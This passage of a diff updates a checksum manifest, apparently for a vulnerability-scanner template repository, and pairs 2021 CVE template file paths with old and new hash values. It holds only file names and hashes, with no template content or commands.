-http/cves/2021/CVE-2021-24316.yaml:344781e0b858923fc6f04eea4e760ee324da6f98 -http/cves/2021/CVE-2021-24320.yaml:e2c00f41154722347629261864b86b3de60afa28 -http/cves/2021/CVE-2021-24335.yaml:9fcaa72106170e2916b206a8af75cfeea8f08ad4 -http/cves/2021/CVE-2021-24340.yaml:65ba6aa639cfc4e5e04c9d10e5e9c509e2e19f03 -http/cves/2021/CVE-2021-24342.yaml:08a6c0cead1f8758749c744ca51f7fce84eb5dec +http/cves/2021/CVE-2021-24285.yaml:186583729fd189b83896607bc302dc79fe48f2c2 +http/cves/2021/CVE-2021-24286.yaml:b15536af51d345dd1d967caa6ad75d386589eb86 +http/cves/2021/CVE-2021-24287.yaml:f5d053ef768d2f29cf96fcda8437db9138b76a2f +http/cves/2021/CVE-2021-24288.yaml:46753abaec21219da699f7c99491fc3c7795569b +http/cves/2021/CVE-2021-24291.yaml:1601e5c8c0cc4a11fe773ff25365240dbd53a5fe +http/cves/2021/CVE-2021-24298.yaml:f336324033ae376c6b3fd72b1450953c1f6002f9 +http/cves/2021/CVE-2021-24300.yaml:3b4c7be4be363afaa44e0126835de0539333a521 +http/cves/2021/CVE-2021-24316.yaml:c7f513655ceee591a291b16cf49bbafb5d806175 +http/cves/2021/CVE-2021-24320.yaml:ee1293cdb162a02090e1ff8dad617c73d50d2148 +http/cves/2021/CVE-2021-24335.yaml:57c5d0d5bdf53a8fa1b3081b857aaaff9a87c880 +http/cves/2021/CVE-2021-24340.yaml:49ef79bd4274ebfb170612f43d7583cf222ab779 +http/cves/2021/CVE-2021-24342.yaml:1164695d5d6346c53213ab58e7d4a1879e5d94c1 http/cves/2021/CVE-2021-24347.yaml:80091b8a106b2f188ac6e0e22dea99c2e1665208 -http/cves/2021/CVE-2021-24351.yaml:bef3bc89bd876d803dbfcb4a0e24eeb3991276ba -http/cves/2021/CVE-2021-24358.yaml:501931f355ae4242760ee9b4f49dd50239d547c1 -http/cves/2021/CVE-2021-24364.yaml:a7bd72a7911a25e329a740fe304a58258b49a0b3 -http/cves/2021/CVE-2021-24370.yaml:e3d9419fffb942e2abc3bb4d329305fbd6fa080a -http/cves/2021/CVE-2021-24387.yaml:036190f052c5f29f9e108ff4226e4fb15c42c67b -http/cves/2021/CVE-2021-24389.yaml:85980550bf335df83dea459d39a8d2a92be642ed -http/cves/2021/CVE-2021-24406.yaml:9d12fad8b6c3e131c0a24ef5b054a92ea45028a2 -http/cves/2021/CVE-2021-24407.yaml:e5d9d95a87f881cc05b6a3be63535805ca86650c -http/cves/2021/CVE-2021-24409.yaml:f0c78c69fc1d8688cfa45203b58d559f91a4d988 -http/cves/2021/CVE-2021-24435.yaml:8b0da704f138c04d97468bfe71f5c498152157bc -http/cves/2021/CVE-2021-24436.yaml:1394fbc9b65aecacf7d11313ad6fec5dffb38d8c -http/cves/2021/CVE-2021-24452.yaml:02905c3b29eb38580fd95731081fcf90fbf4d55a -http/cves/2021/CVE-2021-24472.yaml:e81c2120748522e918f8a325a89ad7697f08f6ca -http/cves/2021/CVE-2021-24488.yaml:4cc7db63909badc5d550f6b0478d91812c2fa756 -http/cves/2021/CVE-2021-24495.yaml:c6b6c97ea226080968333bd8076ad9d1b986db2b -http/cves/2021/CVE-2021-24498.yaml:40dfea25cee92eea54b96e3978e820da2b58fa8f -http/cves/2021/CVE-2021-24499.yaml:9ae12e6d26eefcef1df48fd1b21ff389f206b3fe -http/cves/2021/CVE-2021-24510.yaml:a1114d5a9dd29b25bf9b0c4714526da429e39b23 -http/cves/2021/CVE-2021-24554.yaml:dda7025006867cdec2c58207253b5b81f296f914 -http/cves/2021/CVE-2021-24627.yaml:01c82ca462a818541d76a19854b843084801b55b -http/cves/2021/CVE-2021-24647.yaml:8a70d5fe29de26f406a4a3970aa4162c55dc5bcd -http/cves/2021/CVE-2021-24666.yaml:1e5d056a2fe568a4b416027fbe2e6ca4e10e11c3 -http/cves/2021/CVE-2021-24731.yaml:c2558d6f3d4c19bbce5d0f03cab6d87756a5bea1 -http/cves/2021/CVE-2021-24746.yaml:5d78e40204fbde8fa722f4f2812f2221532ebe58 -http/cves/2021/CVE-2021-24750.yaml:8ae982dedaf99cab175640311394cff4a7294b16 -http/cves/2021/CVE-2021-24762.yaml:e31a06d087d1aee49a146b9f196bded98e849cf8 -http/cves/2021/CVE-2021-24791.yaml:d530beb1d23bd96e198e4a7a959012506f902b5b -http/cves/2021/CVE-2021-24827.yaml:979aa18a7c81415d5050512b4f24ec042b0c2485 -http/cves/2021/CVE-2021-24838.yaml:4e2d9211769e47dae7743ef505443022126615e5 +http/cves/2021/CVE-2021-24351.yaml:b8812099fa877c05828845b98f34da8947de6029 +http/cves/2021/CVE-2021-24358.yaml:70fa7d6c78cff9d14793b2439d44d1255984ca65 +http/cves/2021/CVE-2021-24364.yaml:87f1b387033b27abea5fe640fc100fbcd8bae2b8 +http/cves/2021/CVE-2021-24370.yaml:3469107cc9a10ecec27ee9988fcaedebe63d16c9 +http/cves/2021/CVE-2021-24387.yaml:1531acbd2e213d69357e7e0ddcc9300c589471db +http/cves/2021/CVE-2021-24389.yaml:4b2a52fb97d71df1d7310e7ca2819f8ed9d530d5 +http/cves/2021/CVE-2021-24406.yaml:920a62523c0ea213d62714dd330e36098727c23e +http/cves/2021/CVE-2021-24407.yaml:c977c850af6c23a02cee98fa7b0da0168ce68cd1 +http/cves/2021/CVE-2021-24409.yaml:74abd1e8f67f149a785af0e3aa3bfc175b974c67 +http/cves/2021/CVE-2021-24435.yaml:68ccfb44de8c5234ab5e158257e8b5b8452d8da1 +http/cves/2021/CVE-2021-24436.yaml:6a39d2e472c8d69eb16c7704eded0a224b1cb250 +http/cves/2021/CVE-2021-24452.yaml:92276f421db52e8c9afdbc106c93836d08433349 +http/cves/2021/CVE-2021-24472.yaml:ec66d7b10caeac61aa93e58c5e3052e187453400 +http/cves/2021/CVE-2021-24488.yaml:546d3406cc8d39caad8c341c7fc60ecaf2013056 +http/cves/2021/CVE-2021-24495.yaml:7b29e45ba366ab24b183872786695636c11af81c +http/cves/2021/CVE-2021-24498.yaml:da4a38edec7373a639ed95063c7525585e20dc77 +http/cves/2021/CVE-2021-24499.yaml:a78a57664c1f15eb0a67dcacd6679c2cc983eaf4 +http/cves/2021/CVE-2021-24510.yaml:14c251a85febc4d94ac93cc005ace8b65b4616bd +http/cves/2021/CVE-2021-24554.yaml:4908be2cea38dbf4f2535712221e6530efcf0f8e +http/cves/2021/CVE-2021-24627.yaml:a1c06628458cb85b4fcca1d14f1abdb48921b2c8 +http/cves/2021/CVE-2021-24647.yaml:61b9b69af95570848d708c49732132765da82b88 +http/cves/2021/CVE-2021-24666.yaml:b79b4230f24c770db66073d59414e81d92f8fe7e +http/cves/2021/CVE-2021-24731.yaml:a24a7cc8b782544af098a763c1d16c2ef1eacaf9 +http/cves/2021/CVE-2021-24746.yaml:ab5595992398c6fee1ae15f0a34491f5d13e337b +http/cves/2021/CVE-2021-24750.yaml:8876627215b13d0ac3ebbdc1268e2d9a21226a34 +http/cves/2021/CVE-2021-24762.yaml:255ad5e850fe3d995e5836787ffc526b09c92ea9 +http/cves/2021/CVE-2021-24791.yaml:9be44f7e019167085a909f2cb7859684f2b3ee70 +http/cves/2021/CVE-2021-24827.yaml:a21909539d4ca631e0ae2a976b41eec9db22f678 +http/cves/2021/CVE-2021-24838.yaml:61b691ffb3babe88a5b5ba8e34fb46a0aae14d0c http/cves/2021/CVE-2021-24862.yaml:dcd9236bc4beb6e4c09f00985d6278ea629b2ef4 -http/cves/2021/CVE-2021-24875.yaml:9e5a769673e1147dd17624e56319b3a32da57d3c -http/cves/2021/CVE-2021-24891.yaml:3a8c1536d3fcccc96e882fec9e26a964d30ed714 -http/cves/2021/CVE-2021-24910.yaml:80a68b3d20d3eecddd71ef5f6343afb4f005d018 -http/cves/2021/CVE-2021-24915.yaml:a272708fb964c960caa149e5d4dcf7af153fc0bb -http/cves/2021/CVE-2021-24917.yaml:33f7d84ce77fadb0f44cd452620e956d83e1b3e0 -http/cves/2021/CVE-2021-24926.yaml:2ca6b75193895b044b7b84902dc24e48a8e6fd31 -http/cves/2021/CVE-2021-24931.yaml:21d3d3649c0d8a8ac8e9e63fe838185d6e97a42a -http/cves/2021/CVE-2021-24940.yaml:0b10175505be9d28e59ac54c28238e18c5b05ccd -http/cves/2021/CVE-2021-24946.yaml:397f385dfec2978cb4c0325a94a2b16f01ddea7a -http/cves/2021/CVE-2021-24947.yaml:c2bf3de54657f27161d042855f709342ee4ba1a3 -http/cves/2021/CVE-2021-24956.yaml:192be069dbcade806509373e403c3934c09b19f9 -http/cves/2021/CVE-2021-24970.yaml:4b8181a90c0de1760cfb36ac276e1a40f2f0d5d6 -http/cves/2021/CVE-2021-24979.yaml:148b649f491cbd21c69638be8f3fec04c4fb4124 -http/cves/2021/CVE-2021-24987.yaml:7a2452efa83cd7939ada1cd8a9dfb4991b1d4464 -http/cves/2021/CVE-2021-24991.yaml:2eae6618ce21172e56dc95c3621250c77c7bea61 -http/cves/2021/CVE-2021-24997.yaml:347201f5743acb6f6ab44150bed93e082620e75f -http/cves/2021/CVE-2021-25003.yaml:079c93284f6f79262f9bd8d6ae7f1c94a451acac -http/cves/2021/CVE-2021-25008.yaml:66c147b371fa374a329140f78792d96ca6d77598 -http/cves/2021/CVE-2021-25016.yaml:3a0f644b26b3aa3102a77b8e7bf34cce35f587cc -http/cves/2021/CVE-2021-25028.yaml:c88eda29e22972ea83c31b62996d5fbff802a05f -http/cves/2021/CVE-2021-25033.yaml:1974bd7b971e4f55aefa52fafa9576a0d94a42e9 -http/cves/2021/CVE-2021-25052.yaml:5f6a7ae662895d181466a8e5086d5148950f96bb -http/cves/2021/CVE-2021-25055.yaml:96161e30ec4209cf8f25719c50a4bfa42e8a8c88 -http/cves/2021/CVE-2021-25063.yaml:341bc5f3e48c1914919d1605f02e592de93194be -http/cves/2021/CVE-2021-25065.yaml:c9da88471c1c42b54e3a151cc15cb507b1c44653 -http/cves/2021/CVE-2021-25067.yaml:1071f2b7be198491f3ccb1fa833a265cd0315f8a -http/cves/2021/CVE-2021-25074.yaml:9d19692dc2b830de3630cd1dfb43d21ad7ca12f6 -http/cves/2021/CVE-2021-25075.yaml:7b683ce29a1f7183f10dcbc1f435adacdeddef1b -http/cves/2021/CVE-2021-25078.yaml:f62da3f43b02ad9d3a82c3b19847d34006f73757 -http/cves/2021/CVE-2021-25079.yaml:8c1501a56f4f72a4499ecf6715ff446a6c393767 -http/cves/2021/CVE-2021-25085.yaml:dbd72d50187d600923b3ad4687a1b7eb28887b48 -http/cves/2021/CVE-2021-25099.yaml:26e679634ab819e0b335976e425efcba7340d28e -http/cves/2021/CVE-2021-25104.yaml:97354a3a58cf67f88aca6a2334ffaca4cffb94b6 -http/cves/2021/CVE-2021-25111.yaml:689cd84a74482e85198feceaf1c8b9aeded614a1 -http/cves/2021/CVE-2021-25112.yaml:9eb01048140e4f56c66875b7ca4f0dd36a6c067d -http/cves/2021/CVE-2021-25114.yaml:28ea7df0037ebc84a95501ee60725baad8e4fe97 -http/cves/2021/CVE-2021-25118.yaml:092817fe8e3311090992856a804acd4c2e689259 -http/cves/2021/CVE-2021-25120.yaml:01fbe6907fd5690d1ab02ae20decd9596a9622f6 +http/cves/2021/CVE-2021-24875.yaml:644cb1f9b2fdbe0ebe0bf1d3fd43d88197622c18 +http/cves/2021/CVE-2021-24891.yaml:67df145b0abba3412ce65ddef17bb828d23f534d +http/cves/2021/CVE-2021-24910.yaml:979ec83a1ab74610c35dce60e2b580d018b050f0 +http/cves/2021/CVE-2021-24915.yaml:bffe7a4efc298248416d18882daa07e2732b5b9b +http/cves/2021/CVE-2021-24917.yaml:64d5b305dfbd0f8349412f130668b55c8d641b19 +http/cves/2021/CVE-2021-24926.yaml:5729b0991afd7a9d503ddd0eb165bff01ae07cc2 +http/cves/2021/CVE-2021-24931.yaml:5d9ae4e3eecdfc316653b0cf760562a2a440cde8 +http/cves/2021/CVE-2021-24940.yaml:ce6d9636435f06df32e0809a98be1c60a3d82173 +http/cves/2021/CVE-2021-24946.yaml:797e92df62ca6389a22a0a61d5f5f7260bb0404d +http/cves/2021/CVE-2021-24947.yaml:63078b365d0c3a7f560cf2b509190192e33429a5 +http/cves/2021/CVE-2021-24956.yaml:a12bd840ecf133902e110dafe0d06e76cef19663 +http/cves/2021/CVE-2021-24970.yaml:8de4a333f17da6ed3ac6a305b5acd89121e4aea4 +http/cves/2021/CVE-2021-24979.yaml:e43a13c89ddb3158121a614ab596b2eb2f268e2f +http/cves/2021/CVE-2021-24987.yaml:9a2a0ee297fef80907d794cb1f22183b7bb52336 +http/cves/2021/CVE-2021-24991.yaml:49c978436a3ac7debae3ce62f5776d6546b2d073 +http/cves/2021/CVE-2021-24997.yaml:e67460ff020801fb54404bc9e0de1fc3344c3f77 +http/cves/2021/CVE-2021-25003.yaml:7bfc0e792d8b71af0488a20613a1db1020b2c921 +http/cves/2021/CVE-2021-25008.yaml:8d70398dce7430de6f4c02c956d301fc27cd4791 +http/cves/2021/CVE-2021-25016.yaml:186ff556d7b9d4681c3a0e5a410cff98967a7395 +http/cves/2021/CVE-2021-25028.yaml:d47b1c775008a00f87291b8ca5e22ea23f411bed +http/cves/2021/CVE-2021-25033.yaml:5b2f3fd2b0e36c66ae31f83acf7f10283af2a78f +http/cves/2021/CVE-2021-25052.yaml:dfe83de2e98d8050af3415a22e2b994a3acf9232 +http/cves/2021/CVE-2021-25055.yaml:10bc8e23cbb03eab4f87ff626dfbad1bab7c783e +http/cves/2021/CVE-2021-25063.yaml:4ec2e9b2cace35e72b16a91f3c50fcf3bc051cca +http/cves/2021/CVE-2021-25065.yaml:f98f83f1c3df8370442ae3a88b17863e5696ce0e +http/cves/2021/CVE-2021-25067.yaml:2062865451348a31580d2b2982c57a721d313c3f +http/cves/2021/CVE-2021-25074.yaml:13138dec8ede40873dbb61625393bc61b666823b +http/cves/2021/CVE-2021-25075.yaml:b9609c35eabbd09f35e5a22d01816ecaed745e9b +http/cves/2021/CVE-2021-25078.yaml:14013c74925d7618d81a5aea0e09dab176aca9fd +http/cves/2021/CVE-2021-25079.yaml:12cc0db8b2904ad6c3d8528a2709fbf9afb0c334 +http/cves/2021/CVE-2021-25085.yaml:54a844593e8223d34592dcdbbc4abaf7a3868d9b +http/cves/2021/CVE-2021-25099.yaml:ec44b15ee73becb4acc7b0f56cfb8eb89d1ccd3f +http/cves/2021/CVE-2021-25104.yaml:212c226bb01fc5f89d0f61226a941cffb60a2a81 +http/cves/2021/CVE-2021-25111.yaml:a96087a0489029d284baa77800ffb319df2d0d9c +http/cves/2021/CVE-2021-25112.yaml:808c5f9ef51304ace9ff6edb225b33c6bf2acc06 +http/cves/2021/CVE-2021-25114.yaml:c66b7474cdb5f7c6af85f9ab8d91658e9d6c922e +http/cves/2021/CVE-2021-25118.yaml:c0a55f70ac4763fac06ac6e47d952757aa1412b5 +http/cves/2021/CVE-2021-25120.yaml:8b6dcc21e9eb94441426f3e5b45f447d7f72513c http/cves/2021/CVE-2021-25281.yaml:29e9498353d851c5d42ab4a0ebf9314eaca8f8ac -http/cves/2021/CVE-2021-25296.yaml:5ab485cdc85ba2758b77257e6260bfabf1d8c872 -http/cves/2021/CVE-2021-25297.yaml:433294c166e7ba2ec55482b21b03ea010b055c9e +http/cves/2021/CVE-2021-25296.yaml:de9efb8ffb15372e8250e216f0138a02f6f3c89a +http/cves/2021/CVE-2021-25297.yaml:b4d88307339b635112c5e4dd1767d4f70d17aa8a http/cves/2021/CVE-2021-25298.yaml:e06b94f2001b0b98714e405f3f387f7254b22e53 http/cves/2021/CVE-2021-25299.yaml:85d5503e8093ef6a25b32b93ea1fce948aefb169 http/cves/2021/CVE-2021-25646.yaml:b995555cfdfb37913db2e1d65d5cfa60af715852 http/cves/2021/CVE-2021-25864.yaml:bc0acef3850add1744afd477978b8a19f1342a31 -http/cves/2021/CVE-2021-25899.yaml:24dcafd5e7d5412f43959045f223594805553b37 +http/cves/2021/CVE-2021-25899.yaml:3ad123e0a6814f6d1749ce2623770bbbe8731578 http/cves/2021/CVE-2021-26084.yaml:91ea44edd1d768f45237e588febded27874bc21a -http/cves/2021/CVE-2021-26085.yaml:e624673ca905c286969b6861219419cb5589d352 +http/cves/2021/CVE-2021-26085.yaml:7d336aaa6eccc995f47c9fd95e0420b1d1fded32 http/cves/2021/CVE-2021-26086.yaml:33cbaa0521e84bface4e3b73db6fa03c5af62b60 -http/cves/2021/CVE-2021-26247.yaml:baff08a55029edd1df241b5c69f6cf1649198b01 +http/cves/2021/CVE-2021-26247.yaml:7a0098f6856b1ce28ce1ad59fbbe914cc67e5bdb http/cves/2021/CVE-2021-26295.yaml:deeeecfd1e81d43d3519a972c31aefabfdbb21ed -http/cves/2021/CVE-2021-26475.yaml:074dc877b6d855f578abab3d351da98f5e5e0104 -http/cves/2021/CVE-2021-26598.yaml:2ad7def3ed935717f19eac0fe4f4c3e57298983d -http/cves/2021/CVE-2021-26702.yaml:2639dba0c4fec8aae8a946b8aa5d4375b6237c7c -http/cves/2021/CVE-2021-26710.yaml:78cba736d9725746d0c347c8b53fda5df6ade619 -http/cves/2021/CVE-2021-26723.yaml:579bc7c135fbb018428defa2e3a76707dc28f6ba -http/cves/2021/CVE-2021-26812.yaml:d43c9d040809448eea947a05d07949c454884780 +http/cves/2021/CVE-2021-26475.yaml:bcde075b9c82df0ff99e470281ae9984884f0026 +http/cves/2021/CVE-2021-26598.yaml:36ebbe97206119999ffffe1c457b5ccf9a25791d +http/cves/2021/CVE-2021-26702.yaml:c437b6f6052afce28e92c5e3659a2f2659b4ed1c +http/cves/2021/CVE-2021-26710.yaml:a25742949d6c028f975233c0a41a2f60b22afa86 +http/cves/2021/CVE-2021-26723.yaml:b2dc071600b56bea6d34298f7a5809c435220740 +http/cves/2021/CVE-2021-26812.yaml:ea1b5c23753102ba88cd72f419a09af4bf5db635 http/cves/2021/CVE-2021-26855.yaml:1f0104ede388d9cc6b2bbd94ec52c42c04b37201 -http/cves/2021/CVE-2021-27124.yaml:74ff28468a8540edc0d505bb3c9cf1f679348a9a -http/cves/2021/CVE-2021-27132.yaml:19e425f8f750cb1edb5183131f188de6e3b8b692 -http/cves/2021/CVE-2021-27309.yaml:82899d16e41b92412fae41908551a71a5e8bf050 -http/cves/2021/CVE-2021-27310.yaml:a0120889c59b7bbb21594f42371f6ee86fb6893d -http/cves/2021/CVE-2021-27314.yaml:efbc4dd193159c4f461da305c6d77831c8db01e6 -http/cves/2021/CVE-2021-27315.yaml:6eaa6d39fecee41386626bacbacfb36ba15bc131 -http/cves/2021/CVE-2021-27316.yaml:6eeab062dfbcff055570d3a83a4641b9a801149b -http/cves/2021/CVE-2021-27319.yaml:7856d88bd2818a26c5ba4110c6e08557bee2012c -http/cves/2021/CVE-2021-27320.yaml:85c60feedb525f4edebbc3a02354d3c1de86f7ac -http/cves/2021/CVE-2021-27330.yaml:a51d11a86fda36adde17eaf520249c64ee9b8020 -http/cves/2021/CVE-2021-27358.yaml:17629db208d109dcddb2cd0335ef509f25664c0c -http/cves/2021/CVE-2021-27519.yaml:edffeda1400e5bc61a262fe4830ef3c997ef22a9 -http/cves/2021/CVE-2021-27520.yaml:0f7d031688aa7bde5402a3df6d3efa7dda454228 +http/cves/2021/CVE-2021-27124.yaml:b40601623c936b2a4ad9820dacedd182f7085444 +http/cves/2021/CVE-2021-27132.yaml:ed7e0e1b3f3b0c3a8997c423a0adea0488649b53 +http/cves/2021/CVE-2021-27309.yaml:d78227b6eb7e617ed60ded1a11f8aa92e4e55e15 +http/cves/2021/CVE-2021-27310.yaml:4d2481ff91fe4c2de4052c3b69a4165b59a152e0 +http/cves/2021/CVE-2021-27314.yaml:ca891fe77279f004b92cfc51433cfb028ce21c79 +http/cves/2021/CVE-2021-27315.yaml:2326a9d7a8bb7d876c1e81c37c6fe2ad40dae4ab +http/cves/2021/CVE-2021-27316.yaml:564e08d0fdeced812f11a3e7fb95145e611cb21f +http/cves/2021/CVE-2021-27319.yaml:c94f43eda92c917a9b8b92e1da200a18065835ef +http/cves/2021/CVE-2021-27320.yaml:b3bbec5dd14921ed7fee0ec30400c74744538ce2 +http/cves/2021/CVE-2021-27330.yaml:21a5ce1b7cb21af066ca1a282d33aa9ea29bc17b +http/cves/2021/CVE-2021-27358.yaml:6db83b13c4a2d4402d6de3a4e2e5da110e4ea7ff +http/cves/2021/CVE-2021-27519.yaml:a3e81dff5a89fb044090ac9b436a105da3ba4b56 +http/cves/2021/CVE-2021-27520.yaml:f1a201c2353b6122afdba9282c751e96898b4d83 http/cves/2021/CVE-2021-27561.yaml:2b5aa2c7bfb7b68aa194d34acb15d5f7f40a0d05 -http/cves/2021/CVE-2021-27651.yaml:86cae7c110243d41b164026368b0ce23e6e1c39f -http/cves/2021/CVE-2021-27670.yaml:d343abe4f844dcd35c9776d951c542d8075d7c8d +http/cves/2021/CVE-2021-27651.yaml:009a265720001e8ae051e12b7ff57de7d687e19b +http/cves/2021/CVE-2021-27670.yaml:0150740b59088c11c3fe58b3cc8a18a1862c0a3b http/cves/2021/CVE-2021-27748.yaml:eba210d13902f5a60cff6a0fcabef2449a30459c -http/cves/2021/CVE-2021-27850.yaml:16c1fc3b194ceba5e755697642288540da38d112 +http/cves/2021/CVE-2021-27850.yaml:8dad0fcf249bee7e8a078a2b8305821ee1de9436 http/cves/2021/CVE-2021-27905.yaml:27caa16acd1447e7abf70f9ae800b3c783f06c15 -http/cves/2021/CVE-2021-27909.yaml:dca1dd5a047b28fa121dae4a3402e9ad8d252194 +http/cves/2021/CVE-2021-27909.yaml:51dd6a8a959e0c9c26e0a94f807d50ea3c0b432f http/cves/2021/CVE-2021-27931.yaml:38bf7a06968b7a4f1d8564460673fd4ec463c76b http/cves/2021/CVE-2021-28073.yaml:3708c1b88bb493d026117d61d8a0aa9fb020c5a6 -http/cves/2021/CVE-2021-28149.yaml:84fa5692c7591b0a2b85054f625fb67db1a3d930 -http/cves/2021/CVE-2021-28150.yaml:0c133d278aa69e97f77723db8c7769638dcf7f2e +http/cves/2021/CVE-2021-28149.yaml:d5ebded5d8d69bb83f089f3b3efe8eebdac90c20 +http/cves/2021/CVE-2021-28150.yaml:2255f8b848f2fc91528e30b8efccdc7cd51deabe http/cves/2021/CVE-2021-28151.yaml:a821d10a36035c596664e83b4f1f5eddd305bd3d -http/cves/2021/CVE-2021-28164.yaml:c14b4ab3c964ca542fdd7593322632767c8bdbc6 -http/cves/2021/CVE-2021-28169.yaml:107b83fd5ce6e54f9e34b944bb662baeb70c92a6 -http/cves/2021/CVE-2021-28377.yaml:a83b6eac64e0dd9bd8897d5a6c1fb2725162863d +http/cves/2021/CVE-2021-28164.yaml:2f55730fcd47059bb3d23d19768fc0a5677f988e +http/cves/2021/CVE-2021-28169.yaml:106078cbca17835828548d0039961cc2d2e406c4 +http/cves/2021/CVE-2021-28377.yaml:590357622425cef9ef45e15f1d705ff3ef52266d http/cves/2021/CVE-2021-28419.yaml:b13f4f04f08512603df5c10d7dac29d1f118161e http/cves/2021/CVE-2021-28854.yaml:f642fff6999a311047096aeda3bd595410be28be http/cves/2021/CVE-2021-28918.yaml:dc54778204a09ea7b994909cd10ffcf9a2284f5a -http/cves/2021/CVE-2021-28937.yaml:2ac4fe1bd8469882e9f6cf5a3d0c77054d780f8b -http/cves/2021/CVE-2021-29006.yaml:bc0c37db88aaf479ef98e46e82a72e69d4e92c5a -http/cves/2021/CVE-2021-29156.yaml:44013358b1333446cf56696fffc454e77e3769f5 -http/cves/2021/CVE-2021-29203.yaml:ea186a6c4716b2588b4b451f6ca2c82f85ab91fc -http/cves/2021/CVE-2021-29441.yaml:af14ab2a6c4b8a7b4df98a9b36951d54bd6dd0b9 +http/cves/2021/CVE-2021-28937.yaml:6274b79afa9d8fa67565fb18593fd89f31b25da2 +http/cves/2021/CVE-2021-29006.yaml:6d28ad1ba6758c588cd2427f196ac04f13cdce49 +http/cves/2021/CVE-2021-29156.yaml:16508076c703f274fff20e26bf44a1bbd3c05604 +http/cves/2021/CVE-2021-29203.yaml:44f6e65f9f35c778728deaaf27520ec0b08b8bef +http/cves/2021/CVE-2021-29441.yaml:d9eefa4b67cc617a2d1d60bd149dbe5d06257e58 http/cves/2021/CVE-2021-29442.yaml:5c69dd6497eeed3e367c3146a23e77abd3171c61 -http/cves/2021/CVE-2021-29484.yaml:3a849aacd157d0c7a0947c61522922091f49da1d -http/cves/2021/CVE-2021-29490.yaml:9165d10e5bf13507dacdc4c24675c9e7c271617f +http/cves/2021/CVE-2021-29484.yaml:89c7b3bc1aa9e7b6b3610cd310e440c99af805c6 +http/cves/2021/CVE-2021-29490.yaml:8a6b2ac967606a225a77dbe0130273b89ae14861 http/cves/2021/CVE-2021-29505.yaml:f6ce6d506451c7854396c6bc6d2a10942cc7ab6f -http/cves/2021/CVE-2021-29622.yaml:ba6bf8f9e1c965777b43ec8f0cda37d240a0963d -http/cves/2021/CVE-2021-29625.yaml:8e070d36e1f95f95acd01fa82a741672f10fcc77 -http/cves/2021/CVE-2021-3002.yaml:a45dc675e75bbffc99bd5fa9e3b38923f6665f77 -http/cves/2021/CVE-2021-30049.yaml:daaa62209d8ce5ae3228bce70042477b751de297 -http/cves/2021/CVE-2021-30128.yaml:56ec62ed2356924d4f8dbfe383b80236f4484475 -http/cves/2021/CVE-2021-30134.yaml:a0a86300f793460e6d191765320aa92554047c93 -http/cves/2021/CVE-2021-30151.yaml:f66589ec41f45ad94fe0347b86577ae13d7e3fde -http/cves/2021/CVE-2021-3017.yaml:700698618d442c621a148cca16a700914a1115f8 -http/cves/2021/CVE-2021-30175.yaml:70302f31da3580cdbfd5e5ad7225bf471db0135c -http/cves/2021/CVE-2021-3019.yaml:8be0cf28106c565ca2f5f197a4a0ccf400600d78 -http/cves/2021/CVE-2021-30213.yaml:c1227bd150f187baae3f2c73b07ab75c5a35032e +http/cves/2021/CVE-2021-29622.yaml:5bd2758d9aa4b388cb728a4a4d1d43046f90cbf7 +http/cves/2021/CVE-2021-29625.yaml:77ca0385d5f40e545edb605a17f2a19e72cb8fef +http/cves/2021/CVE-2021-3002.yaml:fb48cf56eb73b3f91497064b26bb7177acaa14cb +http/cves/2021/CVE-2021-30049.yaml:5dc5f8629277f1b26adc7a897a6361a9fec55deb +http/cves/2021/CVE-2021-30128.yaml:aa99f0ae54849deec9c1f050a71a64c54933e793 +http/cves/2021/CVE-2021-30134.yaml:c98f75b16aa9562f6c9b39cd77fc5c56eea2009a +http/cves/2021/CVE-2021-30151.yaml:b10ee183b74625ee0972ac929265d5122a0a059a +http/cves/2021/CVE-2021-3017.yaml:580dadf04c7834d57eba6e2150ab929db2c17643 +http/cves/2021/CVE-2021-30175.yaml:9fa60a014889835f6708faeff7073c4dd2f7b16a +http/cves/2021/CVE-2021-3019.yaml:640db28dbcfe4fd5f1cc572b363c3d410e5635db +http/cves/2021/CVE-2021-30213.yaml:2a766bad5217a308801553057d98903b477a9bd9 http/cves/2021/CVE-2021-30461.yaml:766100beea0607608f2df111cb8bf49fd675f8c4 -http/cves/2021/CVE-2021-30497.yaml:fed1341450215a5adad2630049ef8472b4c12fad -http/cves/2021/CVE-2021-3110.yaml:28a17c639e5e5095e30adc62c37a83d8c41e5516 -http/cves/2021/CVE-2021-31195.yaml:2ac9503bc530de614c43edaa8e4524a33119e247 +http/cves/2021/CVE-2021-30497.yaml:2bdad277c79427e359567cd0f8864862532be7de +http/cves/2021/CVE-2021-3110.yaml:96a2195fca87d8dfa14cf72205415f3ac4bed1fb +http/cves/2021/CVE-2021-31195.yaml:93478d8345f943bffd05bf2c80ace673212b98a4 http/cves/2021/CVE-2021-31249.yaml:82b6d0f7eb392f2cb791c71b545fe3ff893cc6a6 http/cves/2021/CVE-2021-31250.yaml:972d4ec3d1429deef99d4dd777fb530d65bfdf24 http/cves/2021/CVE-2021-3129.yaml:9200ddc36020bce3e1f96dc2fbc7dca00e20d430 -http/cves/2021/CVE-2021-31537.yaml:b32b92d225c9b4b08d58399abf863e0e03cdf9a4 -http/cves/2021/CVE-2021-31581.yaml:35a914f83b21f536f85af42204e511735c43b0b3 -http/cves/2021/CVE-2021-31589.yaml:4e3a64975631be6c3f245d128401e3626769d2eb -http/cves/2021/CVE-2021-31602.yaml:28c3317d8cfbc62f686b41823d5ef910465c19ab -http/cves/2021/CVE-2021-31682.yaml:fff0d02c26f69fac0f26bbc97249cd24c3bca57f +http/cves/2021/CVE-2021-31537.yaml:4129b01aa41c73448fb0993ee7628470b208269f +http/cves/2021/CVE-2021-31581.yaml:dd4f614f9d0762c4040280a0fcd5d30b8b17356c +http/cves/2021/CVE-2021-31589.yaml:dad6084d9e2a85fa63dc4e6978c505ee9d8bda93 +http/cves/2021/CVE-2021-31602.yaml:d9c3bc832b0c5fa43706d264d2dc1198e9654309 +http/cves/2021/CVE-2021-31682.yaml:b733c333996ddfb906217b7d2e49978928b199c6 http/cves/2021/CVE-2021-31755.yaml:58397c2f09e539a90e7cd7e80ff63ca2385fe07c -http/cves/2021/CVE-2021-31805.yaml:04d650b96c0911458fcd526f00a5ed84a58463e3 -http/cves/2021/CVE-2021-31856.yaml:be069bb001b80699a90dc6f4238e74014cd94940 -http/cves/2021/CVE-2021-31862.yaml:a5302561d5e53fb3cfea9ba090d6ebc881dda5d2 -http/cves/2021/CVE-2021-32030.yaml:0e570f81d9b8b76cc2b3ade5d8651e577e8b60d9 +http/cves/2021/CVE-2021-31805.yaml:a4e1271cb51250312c0134584e09d505dd0ce928 +http/cves/2021/CVE-2021-31856.yaml:3d1b727237e3d0762427463d9c7506ea0ff936dd 